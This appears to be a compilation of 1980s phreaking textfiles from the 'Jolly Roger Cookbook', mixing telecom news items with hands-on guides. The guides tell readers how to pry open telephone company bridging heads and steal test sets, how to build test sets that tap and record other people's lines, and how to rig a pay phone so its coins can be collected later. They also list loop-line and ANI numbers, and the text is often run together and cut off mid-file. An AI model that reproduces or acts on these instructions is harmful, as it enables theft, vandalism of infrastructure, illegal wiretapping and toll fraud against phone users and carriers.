We look for information in anyway related to the newsletter. If youhavesomething of interests, or something that you saw on television, or in thenewspaper, then upload it to one of the boards listed below. You willreceivefull credit.Pirate'sHollow..................................................(415)593-6784BatesMotel......................................................(619)267-0293===========================================================================¼===
Brought to you by the Jolly Roger in the Cookbook!!!!!!!!!!!!!!!!!!
###########################################################################¼#### _________________________________## /he Remote Informer Newsletter!####--------------------------------------------------------------------------¼--#
# November TRI Issue:05 ##--------------------------------------------------------------------------¼--#### The Editors: Tracker, Ye Cap'n, Norman Bates, and The Reporter##############################################################################¼###===========================================================================¼==== AT&T Rates============================================================================¼=== WASHINGTON -- American Telephone & Telegraph Co. proposed Tuesday tolower its interstate long-distance rates by an average of 3.6 percent toreflect reduced costs in connecting to the local telephone network. The largest decrease -- 6.3 percent -- would be seen in day timeprices"because of the need to make those rates more competitive," AT&T said. Rates for calls made during evening hours would drop 2.2 percent andcalls made during the late night and weekends would be cut by 0.8 percent,thecompany said. The rate reductions would take effect Jan. 1, if they are approved bytheFederal Communications Commission. Reacting to the proposed price cuts, MCI Communications Corp. and USSprint Communications Co., the nation's second-largest and third-largestlongdistance companies respectively, said their response would depend on whattheFCC finally approves but both said they intended to remain competitive withAT&T. AT&T, the nation's largest long-distance company, proposed to the FCCthat its rates drop as much as $800 million, but AT&T said the exact amountwill depend on the access charges the FCC allows the local telephonecompaniesto collect from long distance carriers, which must pay the fees to hookintothe phone local network. AT&T has challenged the new access rates filed by the regional Belloperating companies, contending they are more than $1 billion too high.In proposing its new rates, the long-distance leader told the FCC itexpects local companies' access fees to fall by at least $200 million --whichwould amount to an average rate reduction of less than 1 percent. But thecompany said it believes the FCC will order an additional $600 million inreductions based on AT&T's challenge. "We're confident the FCC will recognize that access charges filed bythelocal telephone companies need to be substantially reduced, which wouldmeanmore savings for our customers," said Larry Garfinkel, AT&T vice presidentfor
marketing. He said the company filed its proposed rates based on disputed chargesbecause "we wanted to let the public react ... and further to let the FCChavefull knowledge of where we were heading given our expectation that we had avalid basis for our dispute." AT&T's long-distance rates have fallen by about 34 percent since thecompany was stripped of its local operating companies by an antitrustdecreenearly four years ago. Since then, phone rate payers have been paying a larger share of thecostsof maintaining the local network through monthly subscriber line charges,now$2.60 for residential customers. That has reduced the long-distance companies' share of local networkexpenses, which they pay in the form of access charges. Jack Grubman, a telephone analyst with PaineWebber Inc., said AT&T'sproposal targets business customers because "that's where the competitionisand where the better (profit) margins are." In addition, it aims to keepthepressure on competition in international calling by extending discounts tomore customers. Grubman added that, if the company's rate proposal isapprovedby the FCC, he would expect no further cuts in AT&T rates in 1988. Wendell Lind, AT&T administrator of rates and tariffs, said the cutsforbusiness and residential customers are about the same because business cutsare offset by a proposed $128 million increase in AT&T's private linerates. AT&T is the only long-distance company whose rates are regulated bytheFCC, but its prices set the pace for the industry. Though AT&T is farlargerthan any of its competitors, its market share has been declining sincedivestiture and the company now says it serves about 75 percent of themarket. In addition to the reductions in basic long-distance rates, AT&Tproposedcutting prices by 5 percent and 5.7 percent for its Pro-America callingplans. The company also proposed to reduce prices by 2.9 percent for its 800Service customers and 4.4 percent for WATS customers, although it wouldincrease the monthly access line charges for those plans by $3.20 toreflecthigher special access charges filed by the local phone companies.] Supplied by Tracker and The Reporter===========================================================================¼==== US Sprint Operator Service Traffic Increases 40%== New Center Added In Dallas============================================================================¼=== ORLANDO, Fla. -- US Sprint Wednesday announced its long distanceoperators who began saying, "May I help you?" just five months ago, are now
handling 3.5 million calls a month. The fiber-optic long-distance carrier, offering the only operatorservicealternative to AT&T has experienced a 40 percent growth in operator servicecalls since it announced its service July 1. Amanda Weathersby, US Sprint vice president of product marketing, saidTuesday, "More and more people are taking advantage of our call completionassistance and alternative billing arrangements. "Customer surcharges are the same as AT&T with the added benefit of USSprint's fiber-optic quality and lower long-distance rates." US Sprint currently offers person-to-person, station-to-station, callcompletion and collect calling. US Sprint has announced an agreement withUSWEST Service Link that will allow anyone to call on US Sprint and chargetheir calls to a Regional Bell Operating Co. calling card beginning infirstquarter 1988. "Previously, our operator service was available only on pre-subscribedUS Sprint phones and recently we added operator assistance for US SprintFONCARD customers," Weathersby said. "With this new agreement, we'll be able to expand our operator serviceto markets such as pay phones, hospitals, and hotels/motels." The newest 24-hour operator service center in Dallas began operationsonOct. 5. US Sprint's other operator service centers are in: Cherry Hill,N.J.; Atlanta; Lombard, Ill. and Reno, Nev. US Sprint is a joint venture of United Telecommunications Inc. ofKansasCity, Mo. and GTE Corp. of Stamford, Conn.] Supplied by Tracker and The Reporter===========================================================================¼==== Pacific Bell Pursuing Calling Card Thief============================================================================¼=== SAN FRANCISCO--(BW)--Pacific Bell is warning consumers to protecttheirtelephone calling cards like any other credit card in the wake of a seriesoffrauds by people posing as phone company employees. A Pacific Bell spokesman says customers in the 213, 805 and 916 areacodes are being victimized by someone who says he is a telephone companyemployee investigating calling card fraud. The individual calls people athome at odd hours, asking for their calling card numbers. He then sellsthenumbers to people who use the numbers to make long distance phone calls. As recently as Monday of this week, 180 long distance calls werebilledto a Sacramento area resident who had given his number to the thief justthreehours earlier. According to Pacific Bell, this kind of scheme and other forms ofcallingcard fraud cost telephone customers nationwide half a billion dollars ayear. The company offered these tips to consumers to avoid becoming a victim
ofcalling card fraud: Never give your calling card number or personal identification numbertoanyone. Any telephone company employee with a legitimate need to know thenumber has access to it. Treat your calling card like any other credit card. Report its lossimmediately by calling the 800 number on the back of the card 800-621-0430. If you receive a suspicious call regarding your telephone callingcard,report it by calling the 800 number on the back of the card. If you receive a call from someone claiming to be a telephone companyemployee and asking for your calling card number, ask for a name and numbertocall back. Then call the local Pacific Bell business office to report theincident. One suspect was arrested in Southern California last week by a quickthinking customer who did just that. Pacific Bell immediately contactedthelocal police department. A suspect holding seven stolen calling cardnumberswas arrested minutes later. Pacific Bell and long-distance telephone companies will creditcustomersfor calling card charges determined to be fraudulent. Pacific Bell is asubsidiary of Pacific Telesis Group, a diversified telecommunicationscorporation based in San Francisco.] Supplied by Tracker and The Reporter===========================================================================¼=== We look for information in anyway related to the newsletter. If youhavesomething of interests, or something that you saw on television, or in thenewspaper, then upload it to one of the boards listed below. You willreceivefull credit.Pirate'sHollow..................................................(415)593-6784BatesMotel......................................................(619)267-0293===========================================================================¼===
Brought to you in the Cookbook courtesy of the Jolly Roger!!!!!!!!!!!
The Phreaker's Guide to Loop Lines courtesy of the Jolly Roger
A loop is a wonderous device which the telephone company created astestnumbers for telephone repairmen when testing equipment. By matching thetone of the equipment with the tone of the loop, repairmen can adjust andtestthe settings of their telephone equipment. A loop, basically, consists of two different telephone numbers. Let'suse A and B as an example. Normally if you call A, you will hear a loudtone (this is a 1004 hz tone), and if you call B, the line will connect,andwill be followed by silence.
This is the format of a loop line. Now, if somebody calls A and someoneelse calls B--Viola!--A and B loop together, and one connection is made.Ma Bell did this so repairmen can communicate with each other withouthaving to call their own repair office. They can also use them to exchangeprograms, like for ANA or Ringback. Also, many CO's have a "Loop AssignmentCenter". If anyone has any information on these centers please tell me. Anyway, that is how a loop is constructed. From this information,anyone can find an actual loop line. Going back to the A and B example,Note: the tone side and the silent side can be either A or B. Don't befooledif the phone company decides to scramble them around to be cute. As you now know, loops come in pairs of numbers. Usually, right aftereachother. For example: 817-972-1890 and 817-972-1891 Or, to save space, one loop line can be written as 817-972-1890/1. This is not always true. Sometimes, the pattern is in the tens orhundreds,and, occaisionally, the numbers are random. In cities, usually the phone company has set aside a phone number suffixthat loops will be used for. Many different prefixes will correspondwith that one suffix. In Arlington, Texas, a popular suffix for loops is 1893 and 1894, anda lot of prefixes match with them to make the number. For Example: 817-460-1893/4 817-461-1893/4 817-465-1893/4 817-467-1893/4 817-469-1893/4 ...are all loops... or a shorter way to write this is: 817-xxx-1893/4 xxx= 460, 461, 465, 467, 469 Note: You can mix-and-match a popular suffix with other prefixs in acity, and almost always find other loops or test numbers. Note: For Houston, the loop suffixes are 1499 and 1799. And for Detroitit's 9996 and 9997. When there are a large number of loops with the same prefix format,chances are that many loops will be inter-locked. Using the above exampleof Arlington loops again, (I will write the prefixes to save space) 460,461,and 469 are interlocked loops. This means that only one side can be usedata given time. This is because they are all on the same circuit. To clarify, if 817-461-1893 is called, 817-460 and 469-1893 cannot becalled because that circuit is being used. Essentialy, interlocked loopsare all the same line, but there are a variety of telephone numbers toaccessthe line. Also, if the operator is asked to break in on a busy loop line he/shewill say that the circuit is overloaded, or something along thoselines. This is because Ma Bell has taken the checking equipment offthe line. However, there are still many rarely used loops which canbe verfied and can have emergency calls taken on them. As you have found out, loops come in many types. Another type of loopis a
filtered loop. These are loop lines that the tel co has put a filter on,sothat normal human voices cannot be heard on either line. However, otherfrequencies may be heard. It all depends on what the tel co wants theloop to be used for. If a loop has gotten to be very popular with thelocal population or used frequently for conferences, etc. the tel co mayfilterthe loop to stop the unwanted "traffic". Usually, the filter will beremoved after a few months, though.
----------------Brought to you by the Jolly Roger
How Ma Bell Works by the Jolly Roger
In this article, I will first describe the termination,wiring, and terminal hardware most commonly used in the Bellsystem, and I will include section on methods of using them. ------------- LOCAL NETWORK -------------The local telephone network between the centraloffice/exchange and the telephone subscribers can be brieflydescribed as follows:From the central office (or local exchange) of a certainprefix(es), underground area trunks go to each area that has thatprefix (Usually more than one prefix per area.) At every fewstreets or tract areas, the underground cables surface. They thengo to the telephone pole (or back underground, depending on thearea) and then to the subsribers house (or in the case of anapartment building or mutliline business, to a splitter or dis-tribution box/panel).Now that we have the basics, I'll try and go in-depth on thesubject. ------------------ UNDERGROUND CABLES ------------------These are sometimes inter-office trunks, but usually in aresidential area they are trunk lines that go to bridging headsor distribution cases. The cables are about 2-3 inches thick(varies), and are either in a metal or pvc-type pipe (orsimiliar). Rarely (maybe not in some remote rural areas) are thecables just 'alone' in the ground. Instead they are usually inan underground cement tunnel (resembles a small sewer or storm-drain.) The manholes are >heavy< and will say 'Bell system' onthem. they can be opened with a 1/2 inch wide crowbar (Hookside)inserted in the top rectangular hole. There are ladder rungs tohelp you climb down. You will see the cable pipes on the wall,with the blue and white striped one being the inter-office trunk(at least in my area). The others are local lines, and areusually marked or color coded. There is almost always a postedcolor code chart on the wall, not to mention Telco manuals de-scribing the cables and terminals, so I need not get into detail.Also, there is usually some kind of test equipment, and oftenBell test sets are left in there. -------------- BRIDGING HEADS --------------
The innocent-looking grayish-green boxes. These can beeither trunk bridges or bridging for residences. The major trunkbridging heads are usually larger, and they have the 'WesternElectric' logo at the bottom, whereas the normal bridging heads(which may be different in some areas-depending on the companyyou are served by. GTE B.H.'s look slightly different. Also, donot be fooled by sprinkler boxes!) They can be found in justabout every city.To open a bridging head: if it is locked (and you're feelingdestructive), put a hammer or crowbar (the same one you used onthe manhole) in the slot above the top hinge of the right door.Pull hard, and the door will rip off. Very effective! If it isn'tlocked (as usual), take a 7/8 inch hex socket and with it, turnthe bolt about 1/8 of a turn to the right (you should hear aspring release inside). Holding the bolt, turn the handle all theway to the left and pull out.To Check for a test-set (which are often left by Bell employees),go inside - First check for a test-set (which are often leftby Bell employees). There should be a panel of terminals andwires. Push the panel back about an inch or so, and rotate thetop latch (round with a flat section) downward. Release thepanel and it will fall all the way forward. There is usually alarge amount of wire and extra terminals. The test-sets areoften hidden here, so don't overlook it (Manuals, as well, aresometimes placed in the head). On the right door is a metal boxof alligator clips. Take a few (Compliments of Bell.). On eachdoor is a useful little round metal device. (Says 'insert gently'or' clamp gently - do not overtighten' etc..) On the front ofthe disc, you should find two terminals. These are for your testset. (If you dont have one, dont despair -I'll show you ways tomake basic test sets later in this article).Hook the ring (-) wire to the 'r' terminal; and the tip (+)wire to the other. (By the way, an easy way to determine thecorrect polarity is with a 1.5v LED. Tap it to the term. pair,if it doesnt light, switch the poles until it does. When itlights,find the longer of the two LED poles: This one will be onthe tip wire (+). Behind the disc is a coiled up cord. Thisshould have two alligator clips on it.. Its very useful, becauseyou dont have to keep connecting and disconnecting the fone (testset) itself, and the clips work nicely.On the terminal board, there should be about 10 screwterminals per side. Follow the wires, and you can see whichcable pairs are active. Hook the clips to the terminal pair, andyou're set! Dial out if you want, or just listen (If someone'son theline). Later, I'll show you a way to set up a true 'tap'that will let the person dial out on his line and receive callsas normal, and you can listen in the whole time. More about thislater...On major prefix-area bridging heads, you can see 'localloops' ,which are two cable pairs (cable pair = ring+tip, a foneline) that are directly connected to each other on the terminalboard. These 'cheap loops' as they are called, do not worknearLy as well as the existing ones set up in the switchinghardware at the exchange office. (Try scanning your prefixes'00xx to 99xx #'s.) The tone sides will announce themselves withthe 1008 hz loop tone, and the hang side will give no response.The first person should dial the 'hang' side, and the otherperson dial the tone side, and the tone should stop if you have
got the right loop.)If you want to find the number of the line that you're on,you can either try to decipher the 'bridging log' (or whatever),which is on the left door. If that doesnt work, you can use thefollwing: --------------------------- ANI # (Automatic Number ID) ---------------------------This is a Telco test number that reports to you the numberthat youre calling from (It's the same, choppy 'Bell bitch' voicethat you get when you reach a disconnected #)For the 213 NPA - Dial 1223 408 NPA - Dial 760 914 NPA - Dial 990These are extremely useful when messing with any kind of lineterminals, house boxes, etc.Now that we have bridging heads wired, we can go on... (don'tforget to close and latch the box after all... Wouldnt want GEand Telco people mad, now, would we?) ------------------------------------- "CANS" - Telephone Distribution Boxes -------------------------------------
Basically, two types:1> Large, rectangular silver box at the end of each street.2> Black, round, or rectangular thing at every telephone pole.Type 1 - This is the case that takes the underground cable fromthe bridge and runs it to the telephone pole cable (The lowest,largest one on the telephone pole.) The box is always on thepole nearest the briging head, where the line comes up. Look forthe 'Call before you Dig - Underground cable' stickers..The case box is hinged, so if you want to climb the pole,you can open it with no problems. These usually have 2 rows ofterminal sets.You could try to impersonate a Telco technician and reportthe number as 'new active' (giving a fake name and fake report,etc.) I dont recommend this, and it probably won't (almostpositively won't) work, but this is basically what Telco linemendo).Type 2 - This is the splitter box for the group of houses aroundthe pole (Usually 4 or 5 houses). Use it like I mentionedbefore. The terminals (8 or so) will be in 2 horizontal rows ofsets. The extra wires that are just 'hanging there' areprovisions for extra lines to residences (1 extra line per house,thats why the insane charge for line #3!) If its the box foryour house also, have fun and swap lines with your neighbor!'Piggyback' them and wreak havoc on the neighborhood (It'seavesdropping time...) Again, I don't recommend this, and itsdifficult to do it correctly. Moving right along... ------------------------------ APARTMENT / BUSINESS MULTILINE DISTRIBUTION BOXES ------------------------------Found outside the buliding (most often on the right side,but not always... Just follow the wire from the telephone pole)or in the basement. It has a terminal for all the lines in thebuilding. Use it just like any other termination box as before.Usually says 'Bell system' or similar. Has up to 20 terminals on
it (usually.) the middle ones are grounds (forget these). Thewires come from the cable to one row (usually the left one), withthe other row of terminals for the other row of terminals for thebuilding fone wire pairs. The ring (-) wire is usually the topterminal if the set in the row (1 of 10 or more), and the tip isin the clamp/screw below it. This can be reversed, but the cablepair is always terminated one-on-top-of-each- other, not on theone next to it. (I'm not sure why the other one is there,probably as aprovision for extra lines) Don't use it though, itis usually to close to the other terminals, and in my experiencesyou get a noisy connection.Final note: Almost every apartment, business, hotel, or anywherethere is more than 2 lines this termination lines thistermination method is used. If you can master this type, you canbe in control of many things... Look around in your area for abuilding that uses this type, and practice hooking up to theline, etc.As an added help,here is the basic 'standard' color-code formultiline terminals/wiring/etc...Single line: Red = Ring Green = Tip Yellow = Ground ** (Connected to the ringer coil in individual and bridged ringer phones (Bell only) Usually connected to the green (Tip)Ring (-) = Red White/Red Stripe Brown White/Orange Stripe Black/Yellow StripeTip (+) = Green (Sometimes yellow, see above.) White/Green Stripe White/Blue Stripe Blue Black/White StripeGround = Black Yellow ---------------------- RESIDENCE TERMINAL BOX ----------------------Small, gray (can be either a rubber (Pacific Telephone) or hardplastic (AT & T) housing deal that connects the cable pair fromthe splitter box (See type 2, above) on the pole to your housewiring. Only 2 (or 4, the 2 top terminals are hooked in parallelwith the same line) terminals, and is very easy to use. This canbe used to add more lines to your house or add an external lineoutside the house. --------- TEST SETS ---------Well, now you can consider yourself a minor expert on theterminals and wiring of the local telephone network. Now you canapply it to whatever you want to do.. Here's another helpfulitem:How to make a Basic Test-Set and how to use it to dial out,eavsdrop, or seriously tap and record line activity.These are the (usually) orange hand set fones used by Telco
technicians to test lines. To make a very simple one, take anyBell (or other, but I recommend a good Bell fone like a princessor a trimline. gte flip fones work excllently, though..) fone andfollow the instructions below.Note: A 'black box' type fone mod will let you tap into theirline, and with the box o, it's as if you werent there. they canrecieve calls and dial out, and you can be listening the wholetime! very useful. With the box off, you have a normal fone testset.Instructions:A basic black box works well with good results. Take the coveroff the fone to expose the network box (Bell type fones only).The terminal should have a green wire going to it (orange ordifferent if touch tone - doesnt matter, its the same thing).Disconnect the wire and connect it to one pole of an SPST switch.Connect a piece of wire to the other pole of the switch andconnect it to the terminal. Now take a 10k hm 1/2 watt 10%resistor and put it between the terminal ad the terminal, which should have a blue and a white wire going to it(different for touch tone). It should look like this:-----Blue wire---------- !----White wire-----! ! 10k Resistor ! !--Green wire-- !---- ! ! SPSTWhat this does in effect is keep the hookswitch / dial pulseswitch (F to RR loop) open while holding the line high with theresistor. This gives the same voltage effect as if the fone was'on-hook', while the 10k ohms holds the voltage right above the'off hook' threshold (around 22 volts or so, as compared to 15-17or normal off hook 48 volts for normal 'on-hook'), givingTest Set Version 2.Another design is similar to the 'type 1' test set (above),but has some added features:From >----------------Tip----------------------Ring-----should all be off now. Now flip the dpst and pick up the fone.The red LED shold be on, but the green shouldnt. If it is,something is wrong with the circuit. You wont get a dial tone ifall is correct.When you hook up to the line with the alligator clips(Assuming you have put this circuit inside our fona and have putalligator clips on the ring and tip wires (As we did before)) youshould have the spst #1 in the off posistion. This will greatlyreduce the static noise involved in hooking up to a line. The redLED can also be used to check if you have the correct polarity.With this fone you will have the ability to listen in on>all< audible line activity, and the people (the 'eavesdropees')can use their fone as normal.Note that test sets #1 and #2 have true 'black boxes', and can beused for free calls (see an article about black boxes).
Test Set Version 3
To do test set 3:Using a trimline (or similar) phone, remove the base and cutall of the wire leads off except for the red (ring -) and thegreen (tip +). Solder alligator clips to the lug. The wireitself is 'tinsel' wrapped in rayon, and doesnt solder well.Inside the one handset, remove the light socket (if it has one)and install a small slide or toggle switch (Radio Shack's micro-miniature spst works well). Locate the connection of the ringand the tip wires on the pc board near where the jack is locatedat the bottom of the handset. (The wires are sometimes black orbrow instead of red and green, respectively). Cut the foil andrun 2 pieces of wire to your switch. In parallel with the switchadd a .25 uf 200 VDC capacitor (mylar, silvered mica, ceramic,not an electrolytic). When the switch is closed, the handsetfunctions normally. With the switch in the other position, youcan listen without being heard.Note: To reduce the noise involved in connecting the clips to aline, add a switch selectable 1000 ohm 1/2 watt resistor inseries with the tip wire. Flip it in circuit when connecting, andonce on the line, flip it off again. (or just use the 'line disc-onect' type switch as in the type 2 test set (above)). Alsoavoid touching the alligator clips to any metal parts or otherterminals, for i causes static on the line and raises poeple'ssuspicions. --------- RECORDING ---------If you would like to record any activity, use test set 1 or2 above (for unattended recording of >all<> Find a bell test set in a manhole or a bridging head and'Borrow it indefinately...
2> Test sets can be purchased from: Techni-Tool 5 Apollo Road Box 368 Plymouth Meeting PA., 19462Ask for catalog #28They are usually $300 - $600, and are supposed to have MFdialing capability as well as TT dialing. They are also of muchhigher quality than the standard bell test sets.If you would like to learn more about the subjects covered here,I suggest:1> Follow Bell trucks and linemen or technicians and ask subtle questions. also try 611 (repair service) and ask questions..2> Explore your area for any Bell hardware, and experiment with it. Don't try something if you are not sure what youre doing, because you wouldnt want to cause problems, would you?
------------------Jolly Roger
Getting Money out of Pay Phones by the Jolly Roger
I will now share with you my experiences with pay telephones. You willdiscoverthat it is possible to get money from a pay phone with a minimum of effort.Theory: Most pay phones use four wires for the transmission of data andcodes to the central office. Two of them are used for voice (usually redandgreen), one is a ground, and the last is used with the others for thetransmission of codes.It is with this last wire that you will be working with. On the pay phonethatI usually did this to, it was colored purple, but most likely will beanothercolor.What you will do is simply find a pay phone which has exposed wires, suchthatone of them can be disconnected and connected at ease withoutfear of discovery. You will discover that it is usually a good idea tohave some electrical tape along with you and some tool for cutting thistape.Through trial and error, you will disconnect one wire at a time startingwiththe wires different than green and red. You do want a dial tone duringthis operation.What you want to disconnect is the wire supplying the codes to thetelephonecompany so that the pay phone will not get the 'busy' or 'hang-up' command.Leave this wire disconnected when you discover it.What will happen: Anytime that someone puts any amount of money into thepayphone, the deposit will not register with the phone company and itwill be held in the 'temporary' chamber of the pay phone.Then, (a day later or so) you just code back to the phone, reconnect thewire,and click the hook a few times and the phone will dump it all out theshute.(What is happening is that the 'hangup' code that the phone was notreceiving due to the wire being disconnected suddenly gets the code and
dumps its' 'temporary' storage spot.)You can make a nice amount of money this way, but rememberthat a repairman will stop by every few times it is reported broken andrepair it, so check it at least once a day.Enjoy and have fun.. Many phones I have done this to, and it workswell with each.. --------------------Jolly Roger
Computer Based PBX Courtesy of the Jolly Roger (Originally an Apple ][ file for forgive the upper case!)
TO GET A BETTER UNDERSTANDING OF WHAT A PBX CAN DO, HERE ARE A FEW BASICFUNDAMENTALS.THE MODERN PBX IS A COMBINED COMPUTER,MASS STORAGE DEVICE,AND OF COURSE A SWITCHING SYSTEM THAT CAN: [1] PRODUCE ITEMIZED,AUTOMATED BILLING PROCEDURES,TO ALLOW THE IDENTIFICATION AND MANAGEMENT OF TOLL CALLS. [HAHAHA] [2] COMBINE DAYTIME VOICE GRADE COMMUNICATION CIRCUITS INTO WIDEBAND DATA CHANNELS FOR NIGHT TIME HIGH SPEED DATA TRANSFERS. [3] HANDLES ELECTRONIC MAIL [ INCLUDING OFFICE MEMOS ]. [4] COMBINE VOICE CHANNELS INTO A WIDEBAND AUDIO/VISUAL CONFERENCE CIRCUIT,WITH THE ABILITY TO XFER AND CAPTURE SLIDES,FLIPCHARTS,PICTURES OF ANY KIND.BOTH THE EXTERNAL AND INTERNAL CALLING CAPACITY OF THE PBX SYSTEM MUST BECAREFULLY CONSIDERED BECAUSE MANY BUSINESS OPERATIONS RUN A VERY HIGH RATIOOF INTERNAL STATION TO STATION DIALING AND A LOW CAPACITY SYSTEM WILL NOTHANDLE THE REQUESTED TRAFFIC LOAD.A CRITICAL FACTOR IS THE NUMBER OF TRUNKS AND THE CENTRAL OFFICE FACILITIESTHAT ARE USED FOR OUTSIDE CONNECTIONS.ANOTHER IS THE NUMBER OF JUNCTIONS OR[LINKS] THAT MAKE UP THE INTERNAL CALLING PATHS.TO UNDERSTAND THE SERVICES AVAILABLE ON A TYPICAL COMPUTER RUN PBX IT ISNECESSARY TO INTRODUCE THE SUBJECT OF TIME DIVISION SWITCHING.IN A TIMEDIVISION SWITCHING NETWORK ALL CONNECTIONS ARE MADE VIA A SINGLE COMMON BUSCALLED (OF COURSE) A 'TIME-DIVISION BUS'.EVERY LINE TRUNK THAT REQUIRES ACONNECTION WITH ANOTHER IS PROVIDED WITH A PORT CIRCUIT.ALL PORT CIRCUITSHAVE ACCESS TO THE TIME DIVISION BUS THROUGH A TIME DIVISION SWITCH.[WHEN TWO PORTS REQUKRE CONNECTION,THEIR TIME DIVISION SWITCHES OPERATE ATA VERY HIGH FREQUENCY (16,000 TIMES PER SECOND).THIS TECHNIQUE,WHICH ISCALLED 'SPEECH SAMPLING',ALLOWS MANY SIMULTANEOUS CONNECTIONS OVER THE SAMETIME DIVKSION BUS.EACH CONNECTION IS ASSIGNED A TIME INTERVAL,THE 'TIMESLOT',AND THE NUMBER OF TIME SLOTS IDENTIFIES THE NUMBER OF SIMULTANEOUSCONNECT-IONS AMONG PORTS.]THE NEXT CRITICAL ITEM IS CIRCUIT PACKS.THE SYSTEM ELEMENTS THAT WE WILL BEDESCRIBING IN FUTURE TUTORIALS [LINES/TRUNKS/SWITCHES,MEMORY AND CONTROL]ARECONTAINED ON PLUG IN CIRCUIT PACKS.EACH LINE CIRCUIT PACK CONTAINS A NUMBEROF LINES,IN EXAMPLE,FOUR.BUT THE ASSIGNMENT OF STATION NUMBERS TO ACTUALPHONE LINE CIRCUITS IS FLEXIBLE.THE SYSTEM MEMORY IS CONTAINED IN CIRCUIT PACKS WHICH PROVIDE THE CALLPROCESSING FUNCTIONS.THE CIRCUIT PACKS ARE HELD IN SMALL FRAMES CALLED'CARRIERS'.WITHIN EACH CARRIER,THE CIRCUIT PACKS ARE PLUGGED INTOPOSITIONS:THE 'SLOTS'.EVERY CIRCUIT CAN BE ADDRESSED BY,SAY A FIVE DIGIT NUMBER WHICHTELLS ITS LOCATION BY CARRIER-SLOT-CIRCUIT.... [STARTING TO GET THE IDEA?]THERE CAN BE THREE TYPES OF CARRIERS IN A MODERN PBX SYSTEM: O LINE CARRIERS
O TRUNK CARRIERS O CONTROL CARRIERSTHE LINE CARRIERS CONTAIN STATION LINES.IN A.T.& T.'S "DIMENSION" MODEL,FOREXAMPLE,A TOTAL OF 52 TO 64 LINES ARE PROVIDED.THE TRUNK CARRIERS CONTAINSLOTS FOR 16 TRUNK CIRCUIT PACKS.THE CONTROL CARRIER INCLUDES PROCESSOR,MEMORY,CONTROL CIRCUITRY,DATA CHANNELS FOR ATTENDANT CONSOLE CONTROL ANDTRAFFIC MEASUREMENT OUTPUTS.PBX SYSTEMS WILL DIRECTLY REFLECT THE TYPES OF SERVICES OFFERED AT THE C.O. O CCSA O CCIS O PICTUREPHONES [SOONER THAN YOU THINK MY PHRIENDS]COMMON CONTROL SWITCHING ARRANGEMENTS ( CCSA ) PERMIT ANY UNRESTRICTEDTELE-PHONE STATION TO CALL ANY OTHET INTERNAL OR EXTERNAL SYSTEM STATION BYUSINGTHE STANDARD SEVEN DIGIT NUMBER.ALTERNATE ROUTING IS A FEATURE OF CCSASERVICETHE INTERFACILITY,ALTERNATE ROUTED CALLING PATHS ARE ACCOMPLISHED AT THETELE-PHONE COMPANY CENTRAL OFFICE LEVEL,NOT AT THE PBX LEVEL.A SYSTEM OF INTEREST TO LARGE SCALE TELEPHONE USERS IS COMMON CHANNELINTER-OFFICE SIGNALLING (CCIS).TYPICALLY,THIS TECHNIQUE EMPLOYS COMMON CHANNELSTOCARRY ALL INTERFACILITY SIGNALLING INSTRUCTIONS: DIAL PULSES,ON HOOK(IDLE),OFF HOOK (BUSY),AND SO ON,BETWEEN TWO SWITCHING CENTERS. [ GETTING WARM ].CCIS REPLACES OLDER METHODS OF INTEROFFICE SIGNALLING SUCH AS 'IN BAND' AND'OUT OF BAND' TECHNIQUES. BY THE WAY,REAL PHREAKS ARE SELLING THEIR BOXESTOIDIOTS WHO STILL THINK THE'RE WORTH ALOT...THE FORMER (IN BAND) TRANSMITSSIGNALLING DATA WITHIN THE NORMAL CONVERSATION BANDWIDTH.IT'S SHORTCOMINGISTHAT FALSE INFORMATION MAY BE TRANSMITTED DUE TO UNIQUE TONE OR NOISECOMBINATIONS SET UP IN THE TALKING PATH. [THIS IS THE OFFICIAL REASONING].OUT OF BAND SIGNALLING TECHNIQUES PLACED THE INTEROFFICE DATA IN SPECIALCHANNELS,GENERALLY ADJACENT TO AND IMMEDIATELY ABOVE THE VOICE PATH.TO PRE-SERVE INTERCHANNEL INTEGRITY,OUT OF BAND SIGNALLING REQUIRES VERY EFFECIENTFILTERING OR GREATER 'BAND GUARD' SEPERATION BETWEEN CHANNELS.
Brought to you in the Cookbook courtesy of the Jolly Roger!!!!!!!!!!!!

Subject: PC-Pursuit Port Statistic's Date: 06/29/89 Written by: PC-Pursuit Users ============================================================ Introduction: ============= The last 30 days of PC-Pursuit have been extremely controversial. Users and ex-users have demanded accurate statistics, and Telenet has provided us with very little. And the data that was provided is questionable. Well, here is some data that is guaranteed to be accurate and make Telenet scream. If you wish to update this data on your own, we will tell you how later in this text. The following chart consists of all the direct Telenet
addresses of the PC-Pursuit city nodes and the total number of modems on each node. Here is what the data means: NJNEW/3 2011 .12 56 ! ! ! ! \-- Total Number of Modems in NJNEW ! ! ! \- Last Working Suffix of Address sequence. ! ! \- Direct Telenet Address Prefix. ! \--- Baud Rate of This Port is 300. \--------- Mnemonic. Please note that there are several perfectly legal ways to connect to a PC-Pursuit port such as NJNEW/3: Ways To Connect to NJNEW/3: 1) C D/NJNEW/3,PCP10000, [HUNT] 2) C 2011,PCP10000, [HUNT] 3) C 2011.10,PCP10000, [NON HUNT] The first, is self explanatory. The second does the same thing as the first, only that it is slightly faster and gives the user much greater flexibility. The third is an example the flexibility, because a request is made to connect to the tenth, and only the tenth, modem on the NJNEW/3 port. By simply attempting to connect to every single modem in the 2011 chain, we were able to count the number of modems on each port and come up with the following charts which were extracted on June the twenty ninth of the year 1989: Rotary Direct Max. City Rotary Direct Max. City Port Address Range Total Port Address Range Total -------- ------- --- ----- -------- ------- --- ----- NJNEW/3 2011 .12 56 CAOAK/3 4155 . 4 16 /12 201301 .40 /12 415216 . 8 /24 20122 . 4 /24 41511 . 4 DCWAS/3 202115 . 6 46 CAPAL/3 415106 . 4 12 /12 202116 .24 /12 415224 . 8 /24 202117 .16 /24 CTHAR/3 8 CASFA/3 415215 . 6 20 /12 203120 . 8 /12 415217 .10 /24 /24 41523 . 4 WASEA/3 20617 . 4 30 ORPOR/3 50320 . 2 8 /12 20619 .22 /12 50321 . 6 /24 20621 . 4 /24 NYNYO/3 212315 . 4 22 AZPHO/3 60222 . 4 20 /12 212316 .14 /12 60223 .12 /24 21228 . 4 /24 60226 . 4 CALAN/3 213412 . 8 40 MNMIN/3 612120 . 4 22 /12 213413 .28 /12 612121 .14 /24 21323 . 4 /24 61222 . 4 TXDAL/3 214117 . 6 30 MABOS/3 617311 . 4 32 /12 214118 .22 /12 617313 .20 /24 21422 . 4 /24 61726 . 8 PAPHI/3 215112 . 6 36 TXHOU/3 713113 . 8 42 /12 2155 .22 /12 713114 .24 /24 21522 . 8 /24 71324 .10 OHCLE/3 21620 . 4 26 CACOL/3 71423 . 4 18 /12 21621 .18 